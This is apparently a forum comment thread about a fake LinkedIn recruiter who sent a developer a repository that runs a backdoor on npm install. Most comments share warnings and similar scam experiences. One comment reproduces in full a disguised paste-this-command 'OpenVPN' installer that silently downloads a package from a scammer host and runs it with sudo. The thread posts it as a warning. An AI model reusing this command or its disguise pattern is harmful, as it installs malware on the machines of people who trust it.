A backdoor in a LinkedIn job offer

> a recruiter at a small crypto startup [...] she described a broken proof-of-concept they needed a lead engineer for, and then sent me a public GitHub repo to review. Specifically, she asked me to “check out the deprecated Node modules issue.”

> ...buried between walls of commented-out tests, the payload runs anything the server sends back to your machine.

> npm runs prepare automatically after npm install, so just installing dependencies executes the backdoor.

> The instruction to “check out the deprecated Node modules issue” was bait to get me to run npm install.

Great catch. I've not been phished on LinkedIn before. Surprised it's getting this bad.

So, this is a crime right? Why isn't there a well known '911' for cybercrime to report things like this to and get help? Society needs to catch up with the actual dangers out there and build support networks for this ASAP. This is organized crime and needs organized defense to deal with it.

This is uncomfortably close to a normal interview task now.

Someone sends you a repo, says the install is broken, and asks you to take a look.

A lot of developers would run rpm install before thinking twice, especially if they were tired or looking for work.

Been through this 3 times in the last 6 months. They're getting better. Very credible LI profiles, code looks OK if you only take a glance... The bell start ringing when they insist you to run locally their sh*t

> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Oh, Microsoft.

I had a similar experience, just by email.

https://blog.denv.it/posts/i-was-likely-targeted-by-dprk-in-...

It was likely DPKR.

They seem to using the same domain for multiple targets: reddit thread from 3 months ago:

https://www.reddit.com/r/openclaw/comments/1rlet0h/someone_t...

Why is npm still not blocked by every OS on earth is beyond me. These guys will never learn.

I don't have a LinkedIn profile.

~50% of jobs listed on who is hiring every month require a LinkedIn profile to submit a job application.

In order to find a job, one must bend the knee to LinkedIn first and subjugate themselves to the political (all sides) propaganda on the feed.

"Recruiters" are getting sophisticated.

I spoke on the phone with "Singapore based recruiters" a couple of times who wanted my services as a consultant for "advanced applications for semiconductor devices."

Turns out they were just fishing for inside information on my employer's end customer's applications.

Maybe Mac will finally get decent virtualization framework. Downloading random unprotected scripts from internet, like it is 1995 is getting old pretty fast.

Remember to use protection when meeting random people, and putting their junk deep inside your computer!

I've been getting some job offers on LinkedIn, all of them are shady af. Apply using a platform. Apply recording a video of yourself. Apply by resolving a calibration code test (behind a code platform)...

Isn't this how most NPM authors are hacked these days? I think the axios guy got hit with the same approach over LinkedIn.

This is very likely Lazarus Group - specifically Famous Chollima aka the DPRK

I really want to know what would've happened with an npm install, I guess something boring like crypto mining or identity theft?

> I reported the repo to GitHub and the recruiter to LinkedIn. So far nothing has changed and the code is still up.

Github is really slow when it comes to malicious repos. You'll probably get an email randomly six months from now when they finally see it.

> So far nothing has changed and the code is still up.

That sucks, but it seems to be par for the course, these days.

It’s odd that the operator of the scam knew full stack level details of its implementation. To me, it seems like they were targeting the author, perhaps as something like privilege escalation, identity escalation perhaps.

I wonder if an antivirus software would catch this..

Were I still on Linkedin, I could totally have been caught by this. Thank you for this post, and the technical breakdown.

The company that I currently work for is currently paying for a curation product to scan NPM for vulnerabilities, and to prevent access to typo-squatting packages and new, unverified packages. I suspect that my employer may get to the point of banning NPM entirely, though.

Oh my goodness! I had this playout as is on Friday. I luckily got on the zoom call 20 mins late. Found it weird that the interviewer was pushy and wanted me to download and run an npm repo. I got out of the call quickly.

It’s just so heartwarming to see we are completely indentured to both LinkedIn and GitHub, and forced to curate fake personas and upload our life's work just to secure a paycheck.

Yes, throwaway VPS for interview coding tasks should be the new norm.

I only use LinkedIn for the job postings but they’ve become flooded with nonsense the past few months. Lots of postings from Ladders, Swooped, and various companies like those. I think I’m about to ditch LinkedIn permanently.

> but on a more tired or rushed day

This has nearly gotten me before, and I got lucky.

I feel like there's only going to be more attempts like this, given the state of how many recently made redundant software engineers out there, and the level of desperation to find a job.

Seen similar: https://www.theregister.com/security/2026/04/23/dev-targeted...

I used to get 2-3 shady crypto offers per week on LinkedIn. It stopped when I started replying with AI generated responses demanding multiple verification steps: official email, official offer link, terms and scope etc. And a note with a firm refusal to run any code or install any package on my machine for "recruitment tasks".

I’ve seen a few of these – malicious repos to clone, fake call links that prompt for “driver” downloads, and so on.

The only way around it is to be hyper-vigilant if anyone asks you to run any untrusted code on your computer.

Something similar happened to a friend, repo https://github.com/momonity/cryptoskope/

With how many desperate software engineers there are on the market right now looking for a job, there are going to be scumbags out there trying to take advantage of the desperation. Such people are the worst of the worst of humanity.

Stay vigilant out there everyone.

Would highly recommend running any repo in an isolated environment like a vm

Thought: they may be targeting software developers on the assumption they may have legit credentials lying around from other employers or for public open source projects, or at a minimum some reputation to exploit towards obtaining commits to the same for supply chain attacks.

Honestly, I would have given up before starting. You spend time and effort on these cases only for the company to say "Unfortunately..."

It would have been game over for me.

I'm working 3 remote jobs right now and I can tell you guys to really watch out.

Often they are not malicious, just unsavory business practice where they want free consulting with no intention of hiring you. Another tell is the person is quick to jump to a take home screening project and they are quite good at getting at engineers heads that "leetcode is outdated/they dont believe in it" and whatever they want you to hear.

They know engineers are desperate for jobs right now and if you don't have a backbone they will exploit it.

I am much wiser now that I work multiple salary jobs remotely I realize these 3 golden rules:

- Don't stay loyal to your employers.

- Don't stay honest to those don't value it.

- Don't stay complacent always innovate.

Ah, c'mon! You went all the way to find out the issue and write about it, and won't do the most interesting part which is to tell us what was the remote script that would end up running!?

the entire internet is just phishing at this point

More reasons for me to dislike linked-in. I have an account. I hate it.

As part of a potential interview, I was given login credentials so I could sign in to a site where I was prompted to download a VPN client that would allow me to connect to the company's system (red flags already).

They made the site look like it was an official OpenVPN page, even though the URL was clearly not affiliated. The method of downloading their "VPN" was to copy and paste a script to run in my terminal. They only showed a small snippet of the command, which started with `( brew install openvpn )`, followed by a copy button. After pasting the full command to inspect it, the entire contents was as follows (with the malicious URL removed):

```

( brew install openvpn ) >/dev/null 2>&1 & ovpn_pid=$!; ( url="https://asshole.scammer.dev/openvpn-mac"; policyCategoryId="-1"; installerArgs="url=$url:departmentId=1765561620401102848:sourceInstall=silent:technicianId=7455681275330027520"; silentInstall="true"; waitForProcess(){ processName="$1"; fixedDelay="$2"; terminate="$3"; while pgrep -f "$processName" >/dev/null; do if [ "$terminate" = "true" ]; then pkill -f "$processName" true; return; fi; delay="${fixedDelay:-$((RANDOM % 50 + 10))}"; sleep "$delay"; done; }; checkForRosetta2(){ waitForProcess "/usr/sbin/softwareupdate"; IFS='.' read -r osvers_major osvers_minor <<< "$(/usr/bin/sw_vers -productVersion)"; if [ "$osvers_major" -ge 11 ]; then if ! sysctl -n machdep.cpu.brand_string | grep -q "Intel"; then pgrep oahd >/dev/null 2>&1 /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1; fi; fi; }; checkForRosetta2; DIRECTORY="/Users/Shared/InstallerWorkspace"; mkdir -p "$DIRECTORY"; configFile="$DIRECTORY/agentinstallconfig.properties"; { echo "policyId=$policyCategoryId"; echo "install_args=$installerArgs"; echo "Silent_Install=$silentInstall"; } > "$configFile"; baseName="$(basename "$url")"; downLoadFile="/Users/Shared/$baseName"; curl --silent --fail --location --url "$url" --output "$downLoadFile" >/dev/null 2>&1 && sudo installer -pkg "$downLoadFile" -target / >/dev/null 2>&1; t=$?; rm -f "$configFile" "$downLoadFile"; exit "$t" ) >/dev/null 2>&1 & so_pid=$!; wait "$ovpn_pid"; ovpn_rc=$?; wait "$so_pid"; so_rc=$?; [ "$ovpn_rc" -eq 0 ] && [ "$so_rc" -eq 0 ]

```

Yeah, no. Be careful out there.

By the way, here's the scammer's "company website": https://jtwllc.com/

Superficially looks legit until you start investigating the finer details.

LinkedIn is a cesspool of scams now.

They know there's a high degree of fraud and they don't do anything about it. They don't care.

I've gotten tricked into sending my resume and talking on the phone with legitimate looking recruiters from Google, Netflix, Meta, OpenAI, Anthropic, etc, but LinkedIn does nothing about it.

Yet another reason to be reluctant to even discuss linkedin job offers

now imagine if you were like the rest of us and didn’t write a blog post about it